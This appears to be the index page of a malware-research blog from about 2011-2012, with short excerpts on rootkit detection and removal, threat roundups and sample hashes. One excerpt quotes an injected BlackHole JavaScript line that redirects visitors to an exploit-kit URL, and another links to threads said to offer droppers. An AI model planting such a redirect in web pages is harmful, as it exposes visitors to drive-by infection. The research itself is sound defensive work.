TDL FS dumpers

Kaspersky tdsskiller: http://support.kaspersky.com/downloads/utils/tdsskiller.exe
ESET tdlfsreader: http://eset.ru/tools/TdlFsReader.exe
tdsskiller first. First, edit options: set "Checking TDL FS" to On. Performing...
ZeroAccess detection with the XueTr tool

XueTr is a powerful tool for hidden-code/rootkit detection (available for download from http://www.xuetr.com/download/XueTr.zip). Run it on a machine that was infected with the latest ZeroAccess rootkit. After we...
Necurs rootkit detection

Detailed information (and droppers too) is available on:
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=897
http://www.kernelmode.info/forum/viewtopic.php?f=14&t=1177&p=8933#p8859
Block...
New BlackHole features

I looked at MDL today and suddenly discovered the following: a new method of BlackHole spreading. The js has the form:
document.location='http://westarray.com/main.php?page=a68ea0edbb97ee5c';
ISC wrote about that...
Russian election - hall of shame

1) On the day of the election. Intermediate results: 146,47 % - special wrapping for the pro-Kremlin party.
2) DDoS attacks on social networks and media, such as St. Petersburg Novaya Gazeta, KartaNarusheniy.ru, ...
SpyEye removal with the XueTr tool

SpyEye is a famous trojan that steals your private data. Also known as EyeStye (Microsoft) and Pincav (Kaspersky). It can be identified by any anti-rootkit: only user-mode hooks, no driver. The purpose of the hooks is...
DorkBot/NgrBot removal

Worm:Win32/Dorkbot.I - a worm based on IRC communication (DorkBot family) with backdoor features. Also known as NgrBot and IRCBot. Like SpyEye, it may capture private user data, such as user names and...
Top threats of the last two weeks (20 Dec '11 - 3 Jan '12)

20 Dec '11 - 3 Jan '12
A new wave of Sinowal/Mebroot spreads.
A wave of French ransoms - Trojan Ransom.
At the start of the first week - Winlock/WindowsSecurity.
FakeRean (Rogue:Win32/FakeRean), covers: XP Antispyware...
Top threats of the week 3 Jan '12 - 7 Jan '12

3 Jan '12 - 7 Jan '12
Sinowal/Mebroot.
NgrBot/DorkBot/IRCBot.
Caphaw.A - Backdoor.
Password stealers (ZBot/SpyEye).
Ramnit.
Rogue: FakeRean, Winlock/Ransom, WindowsSecurity.
Cridex.
BlackHole spreads more and more malware

The trend of the last weeks is BlackHole and the many types of malware it spreads. In fact, it is password stealers and ransomware that bring attackers the most profit. So, the most widespread BH...
Top threats of the month, Jan 2012

In the first month of the new year 2012 we observed, in general, a lot of various ransomware, fake antiviruses and password stealers. In the first quarter of January there was a new type of ransomware - Reveton....
New ZBot modifications

MD5: B52BD5D6B18A0A46FA062269BE3B639F
SHA1: 104681a106148e47970ac6c31e83009640ed532b
MD5: 376EC224F2931544E1A7C0703085B9DD
SHA1: ed6a50d67e5e44e22c8950395f78102661a1a32e
MD5:...
BlackHole spreads ZeroAccess/Sirefef

Together with Kafeine we observed that the BlackHole group that distributed Carberp in the past now distributes ZeroAccess. All samples had FUD status. A couple of hashes:
MD5: 4f7c964fe7011de17ccbce326591586f
SHA1:...
Community: Microsoft broke the rules in the ZBot takedown case

The beginning of the story, briefly: http://www.anti-malware.ru/forum/index.php?showtopic=21983
Microsoft decided to strike (disrupt) the infrastructure of a botnet whose bots are based on the original code...
Malware collection and research

Guys, I collected malware over the last few months. If you need information, MD5s or samples for research purposes, leave a message at the post or send a message to my VT profile at...
Bootkits - the survival trend of malware in modern conditions

So, briefly, to the point, and with the emphasis placed where it belongs. Let us begin with what Symantec wrote almost a year ago. The article was called Are MBR Infections Back in Fashion? (MBR infection...
Flamer goes ITW

The original, very detailed and useful CrySys research: http://www.crysys.hu/skywiper/skywiper.pdf. The CrySys report was updated with the addition of Kaspersky's information about the mssecmgr.ocx structure. Steps to infection:...
ZeroAccess - new steps in evolution

ZeroAccess was updated about a month ago. As we remember, previous versions contained a rootkit with VFS functionality and also a modern self-defence method against AV scanners. It also infected...
Removing the Pushbot worm by hand

This research concerns a fresh version of the Pushbot worm - Worm:Win32/Pushbot.VR.
Dropper:
MD5: 3e50b76c0066c314d224f4fd4cbf14d5
SHA1: 8284814c5c5cb0f37fe200b918b65ef89c259a0a
Infects via Facebook spreading...
Interesting malware of the month: trends and hashes

Interesting malware that was discussed over the last month.
1. ZeroAccess/Sirefef was updated, with the feature of a cross-platform file infector and shellcode.
SHA1: 23e1f3a819e4e4af58c4a6d5eb489b90ebd7ae8f
MD5:...